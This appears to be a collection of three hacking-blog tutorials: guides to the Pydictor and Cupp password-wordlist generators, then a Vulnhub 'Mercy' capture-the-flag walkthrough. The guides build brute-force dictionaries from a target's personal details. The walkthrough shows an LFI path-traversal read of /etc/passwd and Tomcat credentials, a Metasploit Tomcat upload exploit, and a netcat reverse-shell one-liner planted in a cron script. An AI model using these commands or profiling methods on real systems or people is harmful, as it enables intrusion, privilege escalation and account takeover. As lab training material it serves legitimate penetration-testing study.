Comprehensive Guide on Pydictor – A wordlist Generating Tool

In this article we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance.

Table of Content

§  What is Pydictor

§  Installation

§  Numeric Dictionary

§  Lower Case Alphabet Dictionary

§  Upper Case Alphabet Dictionary

§  Numeral Coupled With Upper Case Alphabet

§  Upper Case Coupled With Lower Case Alphabet               

§  Numeral Coupled With Lower Case Alphabet

§  Combining Upper Case, Lower Case and Numeral

§  Adding Static Head

§  Adding Static Tail

§  Encoding

§  Character Permutation

§  Multiple Character Group Permutation

§  Social Engineering Dictionary

§  Customizing the Social Engineering Dictionary

§  Manipulating Dictionary Complexity Filter

§  Using Plugin

§  Leet Function

What is Pydictor

Pydictor is one of those tools that both novices and pro can appreciate. It is a dictionary building tool that is great to have in your arsenal when dealing with password strength tests. The tool offers a plethora of features which can be used to create that perfect dictionary for pretty much any kind of testing situation.

Installation

Let’s get cracking, the first thing we do is download Pydictor from GitHub and run it using Python. The moment the tool is executed, the running commands are visible to see other optional arguments.

git clone https://github.com/LandGrey/pydictor.git

cd pydictor

python pydictor.py

-base                     [type]

-base Type            Choose from  (d, L, c, dL, dc, Lc, dLc)

                            d     digital                [0 - 9]

                            L     lowercase letters          [a - z]

                            c     capital letters                  [A - Z]

                            dL    Mix d and L                    [0-9 a-z]

                            dc    Mix d and c                    [0-9 A-Z]

                            Lc    Mix L and c                      [a-z A-Z]

                            dLc   Mix d, L and dL            [0-9 a-z A-Z]

-char                      [custom_char]

-chunk                  [chunk1] [chunk2] ...

-extend                [string_or_file]

-plug                     [pid6,ftp,pid8,birthday,pid4,scratch]

-plug arg [arg ...]   birthday  [begin_date] [end_date], date format: [YYYYMMDD]

ftp                                          [keyword1] [keyword2] ...

pid4                                       chinese id card last 4 digit

pid6                                       chinese id card last 6 digit

pid8                                       chinese id card last 8 digit

scratch                                  [url_or_file]

--conf                    [expression_or_file]

-o,--output         [directory]

-tool                      [handler,hybrider,uniqifer,uniqbiner,shredder,comparer,counter,combiner]

--len                      [minlen] [maxlen]

--head                  [prefix_string]

--tail                      [suffix_string]

--encode             [none,sha1,sha512,b64,url,md516,des,rsa,b32,b16,test,sha256,execjs,hmac,md5]

--occur                  [letter] [digital] [special]

--types                 [letter] [digital] [special]

--regex                 [regex]

--level                   [code]

--leet                    [code]

Numeric Dictionary

We are beginning by exploring the option to create a numeric or as described by the tool, digital, dictionary. Let’s start by keeping it simple, only 5 characters long and limited to 0 – 5. We will be using the “—base” option to accomplish this.

The output is saved by default but in this case we will be saving it to “dict.txt”. The storage location will always appear after each execution. The “cat” command is used to view the output in the terminal.

python pydictor.py --len 5 5 -base d -o dict.txt

Alphabet Dictionary

We will be making a dictionary which only holds lower case alphabets, the length of the words will remain to 5 characters.

python pydictor.py --len 5 5 -base L

Upper Case Alphabet Dictionary

We will now generate a dictionary with all the same metrics as earlier with the exception of changing the base option to upper case alphabets.

The result is visible to see.

python pydictor.py --len 5 5 -base c

Numeric Coupled With Upper Case Alphabet

The base options in Pydictor can be used in conjunction with each other, in this instance we will be coupling numeric (d) and upper case alphabets (c). Let’s see what kind of output we get.

python pydictor.py --len 5 5 -base dc

Upper Case Coupled With Lower Case Alphabet

This time it’s going to be both upper and lower case alphabets together.

python pydictor.py --len 5 5 -base Lc

Numeral Coupled With Lower Case Alphabet

Let’s see what we get when we couple numerals with lower case alphabets.

python pydictor.py --len 5 5 -base dL

 

Combining Upper Case, lower Case and Numeral

Now let’s combine all the 3 options that we’ve been playing. We will now combine upper case, lower case and numeral. To keep the output moving quicker we will limit the word length to 3 characters.

python pydictor.py --len 3 3 -base dLc

Adding Static Head

We will now be adding a static head to all the words, note that the head is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static head in front of all the numerals.

python pydictor.py --len 5 5 --head raj -base d

Adding Static Tail

We will now be adding a static tail to all the words, note that as mentioned in the instance above, the tail is in addition to the 5 character length that is set. In this instance we will be adding “raj” as a static tail at the end of all the numerals.

python pydictor.py --len 5 5 --tail raj -base d

Encoding

Pydictor has an encode function that we can use to encode the words in the dictionary.

It gives us the option to choose from popular encoding algorithms such as Base64, DES, AES, MD5, SHA256, etc. In this instance we will be using Base64 as our algorithm of choice to encode numerals.

In the interest of thoroughness, we will first generate the numerals without encoding and then with encoding.

python pydictor.py --len 5 5 –base d

Now we see what the Base64 encoded output looks like

python pydictor.py --len 5 5 -base d --encode b64

Character Permutation

We can use a permutation of a single word, Pydictor lets us choose a word and churn out as many permutations of it as possible.

python pydictor.py -char raj

Multiple Character Group Permutation

We’ll take Pydictor’s permutation prowess one step further by using the “-chunk” option.

This time we will be giving it multiple group of characters which it will take and churn out as many permutations as possible. It begins in a subtle way by just manipulating one word and then gradually moves on to the others. Notice the progression in the screenshot below.

python pydictor.py -chunk abc ABC 666 . _ @ "'

Social Engineering Dictionary

Pydictor comes with an inbuilt social engineering dictionary builder that lets testers input information from profiling an individual to get a custom tailored dictionary. We run the “help desc” within the social engineering dictionary builder option to see the various defaults it has to offer.

python pydictor.py --sedb

Customizing the Social Engineering Dictionary

“show option” is used within the social engineering dictionary builder to set the various vectors from profiling a target to generate a target specific dictionary. In this instance we will only be inputting the name, birth date, and email and phone number. The vectors are set using the “set” command.

Let’s see what our social engineering dictionary output looks like.

Manipulating Dictionary Complexity Filter

We will be doing two things in this instance, we will be extending a dictionary based on a rule and separating words filtered according to complexity level. The complexity level is set to 3 by default, we will take it up a notch by setting it to 4. The character length is set to a minimum of 1 and a maximum of 6.

We view the latter part of the output.

python pydictor.py -extend raj --level 4 --len 1 6

Using Plugin

Pydictor has plugins built into it by default, we will be suing a plugin that bases its generation on the last 6 digits of a Chinese resident ID card number. We will filter it using the “-occur” function. The occur option lets us defines with the following; letter, numeral and special character, in that order. We will only be looking for results that have numerals occurring 4 times or more in a single string.

python pydictor.py -plug pid6 --types ">=0" ">=4" ">=0"

Leet Function

The leet function can selectively substitute numerals or special characters in the place of alphabets to illustrate; leet turns to L331. We will be using the leet function in conjunction with the occur option and extend function.

This is a more complex ask that we have made from Pydictor than our earlier instances, let’s see what our output looks like.

python pydictor.py -extend /names.txt --leet 0 1 2 11 21 --len 4 16 --occur "<=10" ">0" "<=2"

We hope you enjoyed our little walkthrough of Pydictor. As mentioned earlier, dictionary generators are always a handy thing to have in your arsenal of pentesting tools. This tool is gives the user a lot of advance options which can a bit overwhelming unless the user has a very clear picture of what they want out of this tool.

Don’t be afraid of taking Pydictor for a spin and see what more you can derive out of it.

Stay tuned for more articles on the latest and greatest in hacking.

Comprehensive Guide on Cupp– A wordlist Generating Tool

Hello Friends!! Today we are going explore the function of Cupp which is an authoritative tool that creates a wordlist especially particular for a person that can be use while making brute force attack for guessing login credential.

Table of Content

Introduction to Cupp

How Cupp Works

Getting Started

Generating Custom Dictionary

Adding to Custom Dictionary

Downloading Dictionaries from Cupp Repository 

Downloading Default Usernames and Passwords

Quiet Mode

Introduction to Cupp

Cupp stand for Common User Passwords Profiler and this tool can be used in many circumstances like license penetration tests or forensic crime investigations, CUPP is a cross platform and written in Python and it’s functioning is simple but with very powerful results. This application is a social engineers best friend when it comes to crating targeted password dictionaries which are tailored to an individual.

How Cupp Works

Cupp takes vectors from the profiling done for an individual, such as their nick name, pets name, child’s birthdate, etc. It works on the principle that a password is, more often, a combination of things known to an individual. These known thing are often personal details that are very close to person’s heart.

In cases when a person might use special notations in place of alphabets (e.g: leet can be written as 133t) Cupp has you covered.

Installation and Configuration

Cupp can be downloaded from GitHub using the “git clone” command. Winthin the downloaded Cupp folder, run the “cup.py” file. Once the file is run, the program shows you the various options it has to offer.

git clone https://github.com/Mebus/cupp.git

cd cup

ls

./cup.py

Optional Arguments:

-i      Interactive questions for user password profiling

-w FILENAME      Use this option to profile existing dictionary,

-l      Download huge wordlists from repository

-a      Parse default usernames and passwords directly from Alecto DB.

Project Alecto uses purified databases of Phenoelit and CIRT which merged and enhanced.

-v      Version of the program

Generating Custom Dictionary

Now it’s time to have some fun!

We will be using the interactive option to generate the custom dictionary. You will see that we have the option to input options such as pet’s name, child’s name, partners nickname, etc. All these things are highly personal and very common to find these things in a password, one way or another.

There’s also an option to add any specific keywords, special characters and random numbers. Apart from all this, there’s the option to activate Leet mode, this will make the generated dictionary extremely effective.

That’s all, the dictionary now gets made and saved.

./cupp.py -i

Adding to Custom Dictionary

Cupp gives us the option to add more words to our created dictionary. We can customize the kind of words we would like to add by using the provided options.

./cup.py -w raj.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file on not. In this case our location for output is /root/cupp /raj.txt.cupp.txt

Downloading Dictionaries from Cupp Repository 

Cupp has its own repositories of dictionaries which are pre classified. These dictionaries can be downloaded and used. The downloaded files are compressed and have to be uncompressed to be viewed.

Enter the number to choose name to select dictionary you want to download, we have pressed 16 and downloaded to view a dictionary of Hindi names.

./cupp.py –l

cd directories

cd hindi

gzip -d hindu-names.gz

cat hidu-names

Downloading Default Usernames and Passwords

Cupp can download premade dictionaries holding the most common usernames and passwords from the project Alecto database for usage.

./cupp.py –a

ls

cat alectodb-password.txt

Quiet Mode

Quiet mode is for running Cupp in a more hush-hush way. If you’re the kind of person who does not want a big banner on their screen showing everyone what you’re doing, you’ll like this option. This basically makes for a cleaner screen while cup is carrying out the commands you’re giving it, without the funny cow popping up on top.

We’re going the couple the quite mode option with the dictionary download option that we demonstrated above.

./cupp.py –a –q

We hope you enjoyed this basic walkthrough of the Cupp application. It is a very handy and easy to use tool when it comes to making custom dictionaries. Go ahead and see if it can guess your password.

Stay tuned for more articles on the latest and greatest in hacking!!!

Mercy: Vulnhub Walkthrough

MERCY is a machine dedicated to Offensive Security for the PWK course. MERCY is a name-play, and has nothing to do with the contents of the vulnerable machine. You can download the Mercy vulnerable lab from here. The challenge is to get root on the Targeted Virtual Machine and read the proof.txt within that directory.

Flag: Proof.txt

Tables of Contents:

·         IP discovery and Port Scanning.

·         Browsing the IP on port 8080.

·         Decoding Base64 String.

·         Using Enum4linux tool for enumerating information of the Target Machine.

·         Getting Login Credentials to connect via smbclient.

·         Port Knocking.

·         Discovering accessible directory’s on victim’s machine.

·         Browsing through discovered directory’s.

·         Searching exploit via searchsploit.

·         Finding Login Credentials for Tomcat Server.

·         Logging into Tomcat Server using Metasploit.

·         Exploiting Misconfiguration in the Target Machine.

·         Using Msfvenom for creating payload one-liner.

·         Getting root access.

·         Reading the flag.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.
netdiscover

We found our target –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.105

The NMAP output shows various open ports: 22(ssh), 53(domain), 80(http), 110(pop3), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 993(ssl/imaps), 995(ssl/pop3), 8080(http). Since port 80 is filtered we cannot directly browse the Target IP in the Browser. Here we got a clue as a entry /tryharder/tryharder in robot.txt as it might come in handy later on. Therefore we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So we browse the Target IP on port 8080 on the browser.

Now browsing through the discovered entry /tryharder/tryharder on port 8080 gave us a base64 encoded string. Clearly we need to decode it to move ahead.

On decoding the base64 string we found some Login Credentials which can be of great use later on.

Since port 445 is open on the Target Machine, We thought of enumerating it using enum4linux tool.
enum4linux -a http://192.168.1.105
It gave us few shared folders which can be further used to connect via smbclient.

Now connecting via smbclient using credentials “qiu:password”.
smbclient  \\\\192.168.1.105\\qiu -U qiu
Further exploring through directories we have downloaded the config file on our Linux Desktop.

Reading the contents of the config file gave us a sequence of ports to knock which will result in opening the http port 80.

Knocking the sequence of ports using the following command:

knock 192.168.1.105 159 2739 4

Now from nmap scan we confirmed that http port 80 got open after knocking.

Since port 80 got open, we browsed the Target IP on the browser which displayed the message as you can see in the image, which came out to be useless to further proceed towards our goal.

Now we thought of enumerating for accessible directories on the Target Machine.

dirb http://192.168.1.105

While browsing robots.txt file in the browser gave us two disallowed hidden directories as shown in the image.

Bowsing through the directory 192.168.1.105/nomercy in the browser opened a vulnerability scanner webpage whose banner RIPS 0.53 left us curious to search more about it.

Then while we search RIPS 0.53 over searchsploit, it came out to be an Multiple Local File Inclusions Exploit. Next we copied the exploit over our Linux Desktop and read its copied text file as you can see in the image. Here we also copied the one-liner /windows/code.php?file=../../../../../../etc/passwd.  

We used LFI to take a look at the content of the passwd file as it was shown in the POC.

192.168.1.105/nomercy/windows/code.php?file=../../../../../../etc/passwd

Since we know there is a tomcat service running on the target system we can take a look the tomcat-users.xml file using LFI that will provide us with the username and password, browsing it on browser gave us two Login Credentials for Tomcat Server as shown on the image.

Logging into Tomcat server using Metasploit’s Tomcat Manager using the following credentials “thisisasuperduperlonguser:heartbreakisinevitable”

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 192.168.1.105

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername thisisasuperduperlonguser

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword heartbreakisinevitable

msf exploit(multi/http/tomcat_mgr_upload) > exploit

Now using a one-liner to spawn a tty shell:

python -c 'import pty; pty.spawn("/bin/sh")'

Further logging in as user fluffy.

su fluffy

Password: freakishfluffybunny

Exploring through various directories, we read a file timeclock which gave useful information that a crontab service probably be running.

Moving on!! We created a one-liner payload using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=8888 R

After that append the one-liner payload in the timeclock file.

echo “mkfifo /tmpmzlat; nc 192.168.1.109 8888 0

/tmp/zlat 2>&1; rm /tmp/zlat” >>timclock

Since the one-liner got executed with the timeclock file. Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python -c 'import pty; pty.spawn("/bin/sh")'. Booyeah!! We have got the root access and found proof.txt. We take a look at the content of the file and greeted with a congratulatory message.